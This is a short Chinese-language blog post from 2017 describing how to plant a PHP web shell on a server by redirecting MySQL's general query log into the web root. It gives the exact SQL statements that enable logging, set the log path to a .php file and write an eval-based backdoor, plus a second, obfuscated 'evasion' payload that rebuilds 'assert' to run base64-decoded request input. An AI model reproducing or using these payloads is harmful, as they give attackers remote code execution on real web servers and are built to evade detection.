SQL语句利用日志写shell

前不久刚出的SQL之间利用日志获取SHELL的姿势.

Posted by Rootclay on 2017-03-23

outfile被禁止,或者写入文件被拦截


1
2
3
4
show variables like '%general%'; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file = '/var/www/html/1.php'; #设置日志目录为shell地址
select '<?php eval($_POST[cmd]);?>' #写入shell

必须是root权限


免杀

1
SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"

Post From